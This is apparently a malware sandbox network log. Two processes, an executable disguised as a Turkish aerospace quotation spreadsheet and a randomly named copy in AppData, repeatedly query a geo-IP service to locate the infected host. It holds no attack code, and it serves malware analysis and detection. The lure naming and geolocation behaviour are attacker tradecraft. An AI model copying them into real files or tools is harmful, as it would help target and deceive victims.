2025-01-14 13:14:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49715	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:03 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 13:14:03 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175232 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQjPhTQa%2F%2B3I49QolvsQtuHNI5uOq5vtfzpXkBNf3O8UXpyNiwHiIJ5efXy%2BGyKa%2BbdFmsOBRv0XOF0HAED98uhrrvbq5Bk%2FgrBmd4JpRkJoN%2BFosunR5ian5ZQzZR5YUV9UKTGp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de30b1ee042e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1737&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1681059&cwnd=241&unsent_bytes=0&cid=42202aeb3ac3891c&ts=138&x=0"
2025-01-14 13:14:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49720	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:04 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 13:14:04 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:04 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175233 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kc0YB3aGHzafEgxVMlSmbhRLWMKCm%2BxPkfNEejV8mkEegLD4bF54mMaXsV%2BgZxdoNdaC254b2sfm107unAc4U7IpMsXl8hbXiVZQ1fsIl1qzcuJ34r%2F1bYJvgGOW3BT2cmMgUBVf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de31338af8c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1791&rtt_var=672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1626740&cwnd=238&unsent_bytes=0&cid=6e004f513bbfd83f&ts=132&x=0"
2025-01-14 13:14:04 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49728	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:05 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:06 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:06 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175235 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWmnVmPruFy69AEuM6XKs8RhcjYW3lAhvlk3vO0P9ysTnho1yzApRKWnO%2BnxK1F%2FFrU1T99GBDWSRdiyUT15Ex7BeIcbzB0AZVupfhet8Oo%2FcuCEMOi2U2PC7s8zhroVLw%2FtPRV5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de31b6f90c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1469&rtt_var=570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1889967&cwnd=214&unsent_bytes=0&cid=fe609f1527731005&ts=151&x=0"
2025-01-14 13:14:06 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49734	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:06 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:06 UTC	863	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:06 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175235 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UF0mQpsoAaSR6%2B90BaOlrZzfIeXzkVwm7nSfDOxd8O2bp%2Bxkf4RjKyHN6r%2FOS3e9zHHuExmVsWDU7mupFBSZvCZAHUfff%2BNwSEkishO%2BsWAsr%2FXmTk%2FTObjOYpBnYWWJ8S8wLdw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de31f4e52c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1588&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1838790&cwnd=232&unsent_bytes=0&cid=0c648409b5feddcf&ts=189&x=0"
2025-01-14 13:14:06 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49741	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:07 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:07 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175236 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GcnppI6gOyVQctVkLZjzHJ71JbkQ5DcV210yOzcxNeGbuILAoOvxRFkOhp0f4LGexpmz8eez9iPjiMKynwALS%2Byzgye1CJoPZ%2FfL%2BTNTfABxW7D6kUuY3yVSP6GS7OC0N6IlInjp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de32389a342e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1714&rtt_var=647&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1683967&cwnd=241&unsent_bytes=0&cid=75c8f6e3a56c90f7&ts=152&x=0"
2025-01-14 13:14:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49742	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:07 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 13:14:07 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175236 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZ4zumViPAty5rZ%2Bj%2BbIg1tNqmYi6htBIzR1zhd0dJrpBv3XrKGgbi1x%2BBAgLfONgP%2Bv4iGEctzkhGUbuPUg9yAwkJQFQgLf7fWexug%2BfLmljiZwInsit8XxEYrciRk%2FuRTg6prl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de3254d968cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1981&rtt_var=745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1468074&cwnd=244&unsent_bytes=0&cid=5d7e79513774bae6&ts=164&x=0"
2025-01-14 13:14:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49756	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:08 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 13:14:08 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175237 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=umUqHGzP1YWoSqPM%2ButQA6LgF3EHwZuBoNkku5pgT41TXLXCSFX9BjYs5NtW3reqPY%2B3NddMxbL800kb29il%2FSrkjvloLY6tRItO8FXadVgpIcUCzz%2FU40%2Fs2249Ow6mTne9lUSY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de32b9ae742e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1668&rtt_var=631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1726788&cwnd=241&unsent_bytes=0&cid=e4e02094fb9869ca&ts=148&x=0"
2025-01-14 13:14:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49757	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:08 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:08 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175238 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USayzKeKfkETn8uu0vaDBTfmSn4ByS2mtUdbX70Bf5YGwuy80gq0L5RF27J9n%2FYQQ7gmFEjRmBPNJwbjwIg3txL67v45ZqMWse7kAKa8y1a9TjD6PWUC%2F7%2BJwowBcExlNKvq2Cnv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de32d984a43be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1568&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1779402&cwnd=229&unsent_bytes=0&cid=f98c30850017c715&ts=215&x=0"
2025-01-14 13:14:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49765	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:09 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:09 UTC	865	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175239 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ysv0%2BeM01oGnJkaLB1ANh26Rswv2IkxAsPDkp89DSCu%2FVK5iIjp2qF%2Bsa%2BCp3JhOTrZgoQnjPkmgeh%2FvlREKyHSmmfmPuIR%2B%2FeMQRaHx%2FxgDpwBthsYHnEUfXpRq20fKOyB9cDSG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de33388e543be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1542&rtt_var=593&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1822721&cwnd=229&unsent_bytes=0&cid=604e72860b436dbe&ts=142&x=0"
2025-01-14 13:14:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49771	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:10 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
